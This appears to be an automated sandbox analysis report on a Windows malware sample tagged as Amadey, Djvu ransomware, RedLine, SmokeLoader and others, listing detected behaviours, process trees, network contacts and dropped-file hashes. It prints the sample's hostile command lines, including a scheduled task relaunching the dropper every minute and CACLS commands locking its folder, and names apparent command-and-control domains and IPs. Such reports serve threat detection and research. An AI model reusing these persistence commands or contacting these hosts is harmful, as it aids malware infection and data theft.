Malware Analysis Report

2025-01-18 06:37

Sample ID 231015-rm688afg7z
Target NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe
SHA256 2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7
Tags
amadey djvu glupteba redline smokeloader logsdiller cloud (tg: @logsdillabot) pub1 backdoor collection dropper infostealer loader ransomware trojan vidar d37c48c18c73cc0e155c7e1dfde06db9 up3 discovery evasion persistence rootkit spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7

Threat Level: Known bad

The file NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe was found to be: Known bad.

Malicious Activity Summary

amadey djvu glupteba redline smokeloader logsdiller cloud (tg: @logsdillabot) pub1 backdoor collection dropper infostealer loader ransomware trojan vidar d37c48c18c73cc0e155c7e1dfde06db9 up3 discovery evasion persistence rootkit spyware stealer

Windows security bypass

Amadey

Vidar

Glupteba payload

RedLine

Djvu Ransomware

Detected Djvu ransomware

SmokeLoader

Suspicious use of NtCreateUserProcessOtherParentProcess

Glupteba

RedLine payload

Modifies boot configuration data using bcdedit

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Stops running service(s)

Drops file in Drivers directory

Modifies Windows Firewall

Downloads MZ/PE file

Possible attempt to disable PatchGuard

Checks computer location settings

Loads dropped DLL

Windows security modification

Deletes itself

Reads user/profile data of web browsers

Executes dropped EXE

Checks BIOS information in registry

Modifies file permissions

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Manipulates WinMon driver.

Adds Run key to start application

Checks installed software on the system

Accesses 2FA software files, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook profiles

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in System32 directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Drops file in Windows directory

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of UnmapMainImage

Suspicious behavior: GetForegroundWindowSpam

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Modifies system certificate store

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Uses Task Scheduler COM API

outlook_win_path

outlook_office_path

Suspicious behavior: MapViewOfSection

Suspicious behavior: LoadsDriver

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-15 14:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-15 14:19

Reported

2023-10-15 14:26

Platform

win10v2004-20230915-en

Max time kernel

229s

Max time network

235s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe"

Signatures

Amadey

trojan amadey

Detected Djvu ransomware

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Djvu Ransomware

ransomware djvu

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\92.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1988 set thread context of 3664 N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 5076 set thread context of 4480 N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\FCD8.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\16EA.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\16EA.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\16EA.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\16EA.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of UnmapMainImage

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3184 wrote to memory of 1988 N/A N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 3184 wrote to memory of 1988 N/A N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 3184 wrote to memory of 1988 N/A N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 3184 wrote to memory of 640 N/A N/A C:\Users\Admin\AppData\Local\Temp\D3D2.exe
PID 3184 wrote to memory of 640 N/A N/A C:\Users\Admin\AppData\Local\Temp\D3D2.exe
PID 3184 wrote to memory of 936 N/A N/A C:\Windows\system32\regsvr32.exe
PID 3184 wrote to memory of 936 N/A N/A C:\Windows\system32\regsvr32.exe
PID 1988 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 1988 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 1988 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 1988 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 1988 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 1988 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 1988 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 1988 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 1988 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 1988 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\AADC.exe C:\Users\Admin\AppData\Local\Temp\AADC.exe
PID 936 wrote to memory of 4384 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 936 wrote to memory of 4384 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 936 wrote to memory of 4384 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 3184 wrote to memory of 5076 N/A N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe
PID 3184 wrote to memory of 5076 N/A N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe
PID 3184 wrote to memory of 5076 N/A N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe
PID 3184 wrote to memory of 544 N/A N/A C:\Users\Admin\AppData\Local\Temp\92.exe
PID 3184 wrote to memory of 544 N/A N/A C:\Users\Admin\AppData\Local\Temp\92.exe
PID 3184 wrote to memory of 544 N/A N/A C:\Users\Admin\AppData\Local\Temp\92.exe
PID 3184 wrote to memory of 4268 N/A N/A C:\Users\Admin\AppData\Local\Temp\16EA.exe
PID 3184 wrote to memory of 4268 N/A N/A C:\Users\Admin\AppData\Local\Temp\16EA.exe
PID 3184 wrote to memory of 4268 N/A N/A C:\Users\Admin\AppData\Local\Temp\16EA.exe
PID 3184 wrote to memory of 3312 N/A N/A C:\Users\Admin\AppData\Local\Temp\2310.exe
PID 3184 wrote to memory of 3312 N/A N/A C:\Users\Admin\AppData\Local\Temp\2310.exe
PID 3184 wrote to memory of 3312 N/A N/A C:\Users\Admin\AppData\Local\Temp\2310.exe
PID 5076 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 5076 wrote to memory of 4480 N/A C:\Users\Admin\AppData\Local\Temp\FCD8.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 3184 wrote to memory of 2012 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3184 wrote to memory of 2012 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3184 wrote to memory of 2012 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3184 wrote to memory of 2012 N/A N/A C:\Windows\SysWOW64\explorer.exe
PID 3184 wrote to memory of 708 N/A N/A C:\Windows\explorer.exe
PID 3184 wrote to memory of 708 N/A N/A C:\Windows\explorer.exe
PID 3184 wrote to memory of 708 N/A N/A C:\Windows\explorer.exe
PID 544 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\92.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 544 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\92.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 544 wrote to memory of 2956 N/A C:\Users\Admin\AppData\Local\Temp\92.exe C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe
PID 2956 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 2956 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 2956 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\schtasks.exe
PID 2956 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 2956 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 2956 wrote to memory of 740 N/A C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe C:\Windows\SysWOW64\cmd.exe
PID 740 wrote to memory of 1396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 740 wrote to memory of 1396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 740 wrote to memory of 1396 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Uses Task Scheduler COM API

persistence

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\explorer.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe"

C:\Users\Admin\AppData\Local\Temp\AADC.exe

C:\Users\Admin\AppData\Local\Temp\AADC.exe

C:\Users\Admin\AppData\Local\Temp\D3D2.exe

C:\Users\Admin\AppData\Local\Temp\D3D2.exe

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F9AA.dll

C:\Users\Admin\AppData\Local\Temp\AADC.exe

C:\Users\Admin\AppData\Local\Temp\AADC.exe

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\F9AA.dll

C:\Users\Admin\AppData\Local\Temp\FCD8.exe

C:\Users\Admin\AppData\Local\Temp\FCD8.exe

C:\Users\Admin\AppData\Local\Temp\92.exe

C:\Users\Admin\AppData\Local\Temp\92.exe

C:\Users\Admin\AppData\Local\Temp\16EA.exe

C:\Users\Admin\AppData\Local\Temp\16EA.exe

C:\Users\Admin\AppData\Local\Temp\2310.exe

C:\Users\Admin\AppData\Local\Temp\2310.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 5076 -ip 5076

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 272

C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe

"C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN yiueea.exe /TR "C:\Users\Admin\AppData\Local\Temp\577f58beff\yiueea.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "yiueea.exe" /P "Admin:N"&&CACLS "yiueea.exe" /P "Admin:R" /E&&echo Y|CACLS "..\577f58beff" /P "Admin:N"&&CACLS "..\577f58beff" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "yiueea.exe" /P "Admin:N"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 121.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 onualituyrs.org udp
RU 91.215.85.209:80 onualituyrs.org tcp
RU 91.215.85.209:443 onualituyrs.org tcp
US 8.8.8.8:53 209.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 sumagulituyo.org udp
US 34.94.245.237:80 sumagulituyo.org tcp
US 8.8.8.8:53 237.245.94.34.in-addr.arpa udp
US 8.8.8.8:53 153.141.79.40.in-addr.arpa udp
US 8.8.8.8:53 snukerukeutit.org udp
US 104.198.2.251:80 snukerukeutit.org tcp
US 8.8.8.8:53 lightseinsteniki.org udp
SG 34.143.166.163:80 lightseinsteniki.org tcp
US 8.8.8.8:53 liuliuoumumy.org udp
SG 34.143.166.163:80 liuliuoumumy.org tcp
US 8.8.8.8:53 251.2.198.104.in-addr.arpa udp
US 8.8.8.8:53 163.166.143.34.in-addr.arpa udp
US 8.8.8.8:53 stualialuyastrelia.net udp
RU 91.215.85.17:80 stualialuyastrelia.net tcp
US 8.8.8.8:53 17.85.215.91.in-addr.arpa udp
RU 79.137.192.18:80 79.137.192.18 tcp
US 8.8.8.8:53 18.192.137.79.in-addr.arpa udp
US 8.8.8.8:53 alayyadcare.com udp
PS 213.6.54.58:443 alayyadcare.com tcp
US 8.8.8.8:53 58.54.6.213.in-addr.arpa udp
US 8.8.8.8:53 montereyclub.org udp
US 172.67.196.133:443 montereyclub.org tcp
US 8.8.8.8:53 loveperry.org udp
US 172.67.213.185:443 loveperry.org tcp
US 8.8.8.8:53 133.196.67.172.in-addr.arpa udp
US 8.8.8.8:53 185.213.67.172.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 8.8.8.8:53 api.2ip.ua udp
US 188.114.97.0:443 api.2ip.ua tcp
US 8.8.8.8:53 0.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 wirtshauspost.at udp
SA 178.86.108.125:80 wirtshauspost.at tcp
US 8.8.8.8:53 35.36.251.142.in-addr.arpa udp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
US 8.8.8.8:53 125.108.86.178.in-addr.arpa udp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
SA 178.86.108.125:80 wirtshauspost.at tcp
US 188.114.97.0:443 api.2ip.ua tcp
US 8.8.8.8:53 stualialuyastrelia.net udp
RU 91.215.85.17:80 stualialuyastrelia.net tcp

Files

memory/3776-1-0x0000000000400000-0x00000000005B3000-memory.dmp

memory/3776-2-0x0000000000880000-0x0000000000980000-memory.dmp

memory/3776-3-0x0000000000820000-0x000000000082B000-memory.dmp

memory/3776-4-0x0000000000400000-0x00000000005B3000-memory.dmp

memory/3184-5-0x0000000003350000-0x0000000003366000-memory.dmp

memory/3776-6-0x0000000000400000-0x00000000005B3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AADC.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

C:\Users\Admin\AppData\Local\Temp\AADC.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

memory/1988-21-0x0000000004930000-0x00000000049C8000-memory.dmp

memory/1988-22-0x0000000004AA0000-0x0000000004BBB000-memory.dmp

memory/1988-23-0x0000000004930000-0x00000000049C8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\D3D2.exe

MD5 22b5ba8e29ad46aea74520369763650a
SHA1 5477b1f2384bc99e50cf8414c6adfe2e9c0ab2ec
SHA256 ebd8083f3e802cac490686d05a3fe08e2305a6657a9af5ef38fe772496f621ec
SHA512 38cb42bbb50a3aca19c3af8af01bf5d46e27841f50df2fc421183550daad6b65f91c3e454705a9e3ad9706a198c7bd928d6e2d1487a369cd7d3788e547e6eead

memory/3664-27-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3664-29-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F9AA.dll

MD5 55f1c499b31e58a29f6dacea7580fb69
SHA1 c6e5c6a4bb84374a6b172e8eb0c43aaab5423e1a
SHA256 b2fadb2f33351919a782043b2898b201b7420fd1d57800a1d144710156640854
SHA512 9c2f2189e686e05585c6afef0cb4608b5c81ec89f48b992c600fa95ede32a51dc1ee53df518f97b3fb1c8c096adbc3534562f3d6af921bd9b1781fa9dd7786e1

C:\Users\Admin\AppData\Local\Temp\AADC.exe

MD5 7284de10c970ef4b23460ad9c8b125fe
SHA1 66c0712a8b92fdcf2a58951449828c70f7bdc1d9
SHA256 7ac247d6c3ac3cd5ff3a51d526acac42f44ffa44a80c52cc5808be9713db51ca
SHA512 0425bccda444e0283ad85be179a23883b4db07716248b165754fceb0e42ce3596bd0f48385f57f5009cb6c8616c3d41b741be2b92f8a28f5e5acba6295fea7b7

memory/3664-31-0x0000000000400000-0x0000000000537000-memory.dmp

memory/3664-35-0x0000000000400000-0x0000000000537000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FCD8.exe

MD5 23aca9b594e0ec61e744a486c34ed0ef
SHA1 44d7b53c310732634fbf48c2f313505cdb62c6a8
SHA256 59f7cff19dc1dbd16f7cf67fec46beab356e111b64c0d968d5bcd35dee1f6f61
SHA512 dbd56536231acfe82af1ae7fabf1f25419c9f62c8e5191d6f48d5c3a1c22161fc05aa1bbc2bc0c9b9d58574109a8f7db4d6a927915d9d8cdcc7f0f3b3c58ba33

C:\Users\Admin\AppData\Local\Temp\F9AA.dll

MD5 55f1c499b31e58a29f6dacea7580fb69
SHA1 c6e5c6a4bb84374a6b172e8eb0c43aaab5423e1a
SHA256 b2fadb2f33351919a782043b2898b201b7420fd1d57800a1d144710156640854
SHA512 9c2f2189e686e05585c6afef0cb4608b5c81ec89f48b992c600fa95ede32a51dc1ee53df518f97b3fb1c8c096adbc3534562f3d6af921bd9b1781fa9dd7786e1

C:\Users\Admin\AppData\Local\Temp\92.exe

MD5 55f845c433e637594aaf872e41fda207
SHA1 1188348ca7e52f075e7d1d0031918c2cea93362e
SHA256 f9f9b154f928549c7a4b484909f41352048ce8148c678f4ec32c807c1d173a39
SHA512 5a9b5e83b41041259060e3a29163cdd5ed271c5d476fa455b40ec9bc32bf4bcddaf3aa1ba23faacc2669be420acb905677ec4fcfb3d69e7b9f7908ae5cbd18a4

memory/640-41-0x00007FF7A5510000-0x00007FF7A5E61000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\16EA.exe

MD5 a9991493e536d974f42a70843dae6209
SHA1 9f209dc03fbca602985e9f599732ebfc4b2a0cc3
SHA256 f1d980607c0be60b816ea70efaf0439323463f29ab6b56c4055a171461e31288
SHA512 3d8d8dd9c485e19a4009fb62af94c250d28eaa56f15a3adc189bf9299308ff16c2bff397074b219f9075093df75349062ad860f65957a1c336b0421ff5157b0a

C:\Users\Admin\AppData\Local\Temp\16EA.exe

MD5 a9991493e536d974f42a70843dae6209
SHA1 9f209dc03fbca602985e9f599732ebfc4b2a0cc3
